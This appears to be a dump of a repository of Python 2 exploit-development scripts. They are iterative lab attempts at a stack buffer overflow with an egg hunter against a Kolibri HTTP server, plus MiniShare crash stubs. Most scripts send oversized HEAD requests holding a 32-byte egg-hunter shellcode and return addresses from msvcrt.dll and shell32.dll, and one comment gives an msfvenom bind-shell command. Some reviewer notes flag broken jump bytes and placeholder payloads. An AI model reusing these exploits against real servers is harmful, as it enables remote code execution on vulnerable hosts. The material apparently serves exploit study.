Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()
--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_jmp_back.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Jump-back check (4th attempt series): 515 "A" bytes, the 4-byte address,
# then the trailing jump bytes.

import socket
import os   # unused
import sys  # unused

# NOTE(review): "xEB\xC4" lacks the backslash the 3rd-series scripts use ("\xEB\xC4");
# as written it is the four bytes x, E, B, 0xC4, not the two-byte jump.
Stage1 = "A"*515 + "\x59\x54\xc3\x77" + "xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()
--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_stage2_eip_cyclic.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Second-stage offset discovery (4th attempt series): Stage1 is the hunter
# layout from kol_hunter.py; Stage2 is a 1000-byte cyclic pattern carried in
# the User-Agent header.

import socket
import os   # unused
import sys  # unused

hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# NOTE(review): "xEB\xC4" lacks the backslash the 3rd-series scripts use ("\xEB\xC4");
# as written it is the four bytes x, E, B, 0xC4, not the two-byte jump.
Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "xEB\xC4"
Stage2 = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 12 | 13 | buffer = ( 14 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 15 | "Host: 172.16.73.129:8080\r\n" 16 | "User-Agent: " + Stage2 + "\r\n" 17 | "Keep-Alive: 115\r\n" 18 | "Connection: keep-alive\r\n\r\n") 19 | 20 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | expl.connect(("172.16.73.129", 8080)) 22 | expl.send(buffer) 23 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with a's 16 | Stage1 = "A"*600 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 
172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash_EIP_Push_ESP.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Return-address check (5th attempt series): 515 "A" bytes, the 4 bytes
# \x59\x54\xC3\x77 (0x77c35459 little-endian, see the author's comment), then 2 "B".

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#crash the application and put the push ESP (0x77c35459) into stage1 and then b's after
Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*2

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash_add_hunter_and_jmp_back_60.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Hunter placement (5th attempt series): 478 "A" + 32-byte hunter + 5 "A"
# (= 515) + 4-byte address + 2-byte short jump; the author's comments below
# record the intent of each part.

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#use 
mona -> !mona egg -t b33f -> "b33fb33f"
hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

#EIP: 0x77c35459 push esp # ret | msvcrt.dll
#ESP: jump back 60 bytes "\xeb\xc4"
#use egghunter "b33fb33f"
Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash_cyclic_pattern.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Offset discovery (5th attempt series): the request path is a 600-byte
# cyclic pattern (Aa0..At9).

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#crash the application with a cyclic pattern
Stage1 = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 172.16.73.129:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("172.16.73.129", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/5th time/kol_crash_cyclic_pattern_confirm_bs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with the "B"s in EIP 16 | Stage1 = "A"*515 + "B"*4 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 172.16.73.129:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | 
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Crash reproduction (6th attempt series): the HEAD request path is 600 "A"
# bytes; the target address changes to 192.168.37.131 from this series on.

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#crash the application with a's
Stage1 = "A"*600

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.37.131:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.37.131", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash_eip_crash.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Offset discovery (6th attempt series): the request path is a 600-byte
# cyclic pattern (Aa0..At9).

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#crash the application with a cyclic pattern
Stage1 = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash_eip_crash_b's.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application and EIP with B's 16 | Stage1 = "A"*515 + "B"*4 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | 
expl.connect(("192.168.37.131", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash_jmp_back_60.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Jump-back check (6th attempt series): 515 "A" bytes, the 4-byte address,
# then the trailing jump bytes.

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#jmp esp added from 0x77c35459 from msvcrt.dll
# NOTE(review): "xEB\xC4" lacks the backslash the 3rd/5th-series scripts use ("\xEB\xC4");
# as written it is the four bytes x, E, B, 0xC4, not the two-byte jump.
Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.37.131:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.37.131", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/6th time/kol_crash_jmp_esp.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Return-address check (6th attempt series): 515 "A" bytes, the 4 bytes
# \x59\x54\xC3\x77 (0x77c35459 little-endian, see the author's comment), then 4 "B".

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#jmp esp added from 0x77c35459 from msvcrt.dll
Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*4

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.37.131:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.37.131", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Crash reproduction (7th attempt series): the HEAD request path is 600 "A" bytes.

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#crash the application with a's
Stage1 = "A"*600

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.37.131:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.37.131", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash_eip_crash_b.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Offset check (7th attempt series): 515 "A" bytes followed by 4 "B" bytes
# in the request path.

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#crash the application and EIP with B's
Stage1 = "A"*515 + "B"*4

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.37.131:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.37.131", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash_hunter_plus_stage2.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Two-stage build (7th attempt series): Stage1 in the request path carries a
# 32-byte hunter for the "w00tw00t" tag plus a 4-byte address and a 2-byte
# jump; Stage2 in the User-Agent header is the tag followed by a placeholder
# alphabet (not the msfvenom output the comment below refers to).

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#Egghunter
#Size 32-bytes
#use mona -> !mona egg -t w00t -> "w00tw00t"
hunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=192.168.37.131 LPORT=4444 -e x86/alpha_mixed -f c

# NOTE(review): the address changed from 0x77c35459 (msvcrt.dll, earlier series) to
# 0x7c9d30d7; the author's question mark suggests the module was not confirmed.
#0x7c9d30d7 jmp esp from shell32.dll? 
Stage1 = "A"*478 + hunter + "A"*5 + "\xd7\x30\x9d\x7c" + "\xEB\xC4"
#hunter + shellcode
# NOTE(review): Stage2 is the 8-byte tag plus a 26-byte placeholder, not shellcode.
Stage2 = "w00tw00t" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.37.131:8080\r\n"
"User-Agent: " + Stage2 + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.37.131", 8080))
expl.send(buffer)

launchsploit = """
#----------------------------------------------#
Kolibri Exploit Launched
#----------------------------------------------#
"""

print launchsploit  # Python 2 print statement; printed before the socket is closed

expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash_jmp_back_60.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Jump-back check (7th attempt series): 515 "A" bytes, the 4-byte address
# \xd7\x30\x9d\x7c (0x7c9d30d7 little-endian), 4 "B" bytes, then the 2-byte jump.

import socket
import os   # unused
import sys  # unused

banner = """
#----------------------------------------------#
Kolibri HTTP Server Exploit - Egghunter
#----------------------------------------------#
"""

print banner  # Python 2 print statement

#0x7c9d30d7 jmp esp from shell32.dll? 
16 | Stage1 = "A"*515 + "\xd7\x30\x9d\x7c" + "B"*4 + "\xEB\xC4" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_crash_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #jmp esp added from 0x77c35459 from msvcrt.dll 16 | #Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*4 17 | #0x7c9d30d7 jmp esp from shell32.dll? 
18 | Stage1 = "A"*515 + "\xd7\x30\x9d\x7c" + "B"*4 19 | 20 | buffer = ( 21 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 22 | "Host: 192.168.37.131:8080\r\n" 23 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 24 | "Keep-Alive: 115\r\n" 25 | "Connection: keep-alive\r\n\r\n") 26 | 27 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | expl.connect(("192.168.37.131", 8080)) 29 | expl.send(buffer) 30 | expl.close() 31 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/7th time/kol_pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Kolibri HTTP Server Exploit - Egghunter 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | #crash the application with a cyclic pattern 16 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 17 | 18 | buffer = ( 19 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 20 | "Host: 192.168.37.131:8080\r\n" 21 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 22 | "Keep-Alive: 115\r\n" 23 | "Connection: keep-alive\r\n\r\n") 24 | 25 | expl = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) 26 | expl.connect(("192.168.37.131", 8080)) 27 | expl.send(buffer) # NOTE(review): sendall() would guard against a short write 28 | expl.close() 29 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/minishare-15575/bs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | nops = "A" * 386 + "B" * 4 + "C" * 30 # 386 bytes of filler, a 4-byte "B" marker and 30 "C"s -- presumably the Bs are meant to land in the overwritten slot (nSEH/SEH or EIP); confirm the offset in the debugger 4 | buff = nops 5 | 6 | #[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode] -- planned SEH layout for the final file; this script only writes the offset-finding stage 7 | 8 | f = open("users.txt",'w') # NOTE(review): a with-block would close the file even if write() raises 9 | f.write(buff) 10 | f.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/minishare-15575/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | nops = "A" * 500 # 500 bytes of 0x41 written to users.txt as the crash trigger 4 | 5 | buff = nops 6 | 7 | 